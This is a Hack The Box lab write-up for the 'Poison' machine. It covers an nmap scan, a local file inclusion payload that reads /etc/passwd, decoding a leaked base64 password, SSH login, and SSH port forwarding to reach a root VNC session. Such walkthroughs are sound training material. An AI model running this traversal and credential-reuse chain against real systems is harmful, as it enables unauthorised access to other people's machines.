Hack The Box Write-Up: Poison


Reconnaissance: Portscan with Nmap

As always, we start by port scan with Nmap to enumerate open ports and service versions. For those who want to know more about Nmap’s commands and options, refer to my Nmap Cheatsheet:

nmap -sC -sV -oA poison

-sC: default script scan
-sV: service version detection against open ports 
-oA: Output in the three major formats at once
root@kali:~/Desktop/htb/poison# nmap -sC -sV -oA poison
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-02 09:21 EDT
Nmap scan report for
Host is up (0.25s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

The results of Nmap scan shows:
22/tcp (SSH):
– Service: OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp (WEB):
– Service: Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)

Enumeration: 80/tcp (WEB)

If we access in a browser, we can see the following web page listing several available php pages (ini.php, info.php, listfiles.php, phpinfo.php) .

When we go to “listfiles.php” by clicking Submit button on the page above, its response shows the array including the interesting file “pwdbackup.txt”. In the URL, we see the parameter “?file=” to be passed to the server so you can let it load the text file by editing the value of the parameter to “?file=pwdbackup.txt”.


The text file “pwdbackup.txt” contains a base64-encoding string.


We copy the encoded password to our local machine and run it though a decode 13 times, revealing the password as Charix!2#4%6&8(0. It is likely to be used as SSH credential.

root@kali:~/Desktop/htb/poison# cat encrypted |base64 -d|base64 -d|base64 -d|base64 -d|base64 -d|base64 -d|base64 -d|base64 -d|base64 -d|base64 -d|base64 -d|base64 -d|base64 -d

To see if the target is susceptible to LFI (Local File Inclusion) vulnerabilities, we can do the easy test by editing the value of the file parameter to “?file=../../../../../../../../../etc/passwd”. If you don’t know much about LFI, the OWASP article below is recommend to read first.

Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

Testing for Local File Inclusion

Looking closely at the bottom of “/etc/passwd” displayed above, there is a user named “charix” using “/bin/csh”. So, let’s try to log in to the target via SSH with the stolen credential “Charix!2#4%6&8(0“.

ssh charix@

Now we got a shell successfully.

root@kali:~/Desktop/htb/poison# ssh charix@
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

charix@Poison:~ % id
uid=1001(charix) gid=1001(charix) groups=1001(charix)

charix@Poison:~ % uname -a
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017     root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64

Privilege Escalation (Linux)

Inside the “/home” directory of user charix, we will find the user flag and a secret.zip file.

charix@Poison:~ % ls -la
total 52
drwxr-x---  2 charix  charix   512 May  2 16:17 .
drwxr-xr-x  3 root    wheel    512 Mar 19  2018 ..
-rw-r-----  1 charix  charix  1041 Mar 19  2018 .cshrc
-rw-rw----  1 charix  charix     0 Mar 19  2018 .history
-rw-------  1 charix  charix    32 May  2 16:17 .lesshst
-rw-r-----  1 charix  charix   254 Mar 19  2018 .login
-rw-r-----  1 charix  charix   163 Mar 19  2018 .login_conf
-rw-r-----  1 charix  charix   379 Mar 19  2018 .mail_aliases
-rw-r-----  1 charix  charix   336 Mar 19  2018 .mailrc
-rw-r-----  1 charix  charix   802 Mar 19  2018 .profile
-rw-r-----  1 charix  charix   281 Mar 19  2018 .rhosts
-rw-r-----  1 charix  charix   849 Mar 19  2018 .shrc
-rw-r-----  1 root    charix   166 Mar 19  2018 secret.zip
-rw-r-----  1 root    charix    33 Mar 19  2018 user.txt

You can use scp to transfer the secret.zip from the target to our attacking machine.

scp charix@ ./

It can be unzipped with the same password “Charix!2#4%6&8(0” but unfortunately the unzipped file “secret” is non-human readable.

root@kali:~/Desktop/htb/poison# scp charix@ ./
Password for charix@Poison:
secret.zip                                    100%  166     0.5KB/s   00:00    

root@kali:~/Desktop/htb/poison# unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password: 
 extracting: secret 

root@kali:~/Desktop/htb/poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators

root@kali:~/Desktop/htb/poison# cat secret

As a next step, we type the command “ps -auwwx” to look for some processes that we can leverage for privilege escalation on the target.

charix@Poison:~ % ps -auwwx

-a: list the processes of all users on the system
-u: provide detailed information about each process
-x: list processes that have no controlling terminal, such as daemons
-ww: Wide output with unlimited width

We’ve found that the vnc process running over 5901/tcp on only localhost by root.

charix@Poison:~ % ps -auwwx | grep vnc
root    529   0.0  0.9  23620  9040 v0- I    11:25     0:00.17 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

You can also check this with “netstat -an”.

charix@Poison:~ % netstat -an
charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0     44       ESTABLISHED
tcp4       0      0           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0         *.*                    LISTEN
tcp4       0      0         *.*                    LISTEN
udp4       0      0 *.514                  *.*                    
udp6       0      0 *.514                  *.* 

Since the VNC ports (5801 and 5901) were only listening on localhost, so we can’t access them from our attacking machine. To solve this problem, we’ll use “SSH local port forwarding” well explained in the article below.

Local port forwarding – A port from the client PC is forwarded to the remote PC. A connection to this port enables data to be sent bidirectionally over the SSH connection between the client and remote PC.

SSH Local and Remote Port Forwarding with VNC
SSH Local and Remote Port Forwarding with VNC

Using the ssh command as follows, it’s possible to tunnel VNC’s traffic over SSH between attacking our machine and the target.

ssh -L 6999: charix@

charix@ SSH host to connect to
-L: Option to enable local port forwarding
6999 = Port on the client PC
127. = Host server to connect to (the remote PC, same as
5901 = Port on the remote host (forwarded from the client PC)
root@kali:~/Desktop/htb/poison# ssh -L 6999: charix@
Password for charix@Poison:
Last login: Sat May  2 18:03:41 2020 from
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!
		-- Dru <genesis@istar.ca>
charix@Poison:~ % 

Once the secure session is established with SSH local port forwarding, you can remotely access the root shell on the target by connecting 6999/tcp on localhost from our attacking machine using vncviewer.

vncviewer -passwd secret
root’s X desktop (Poison)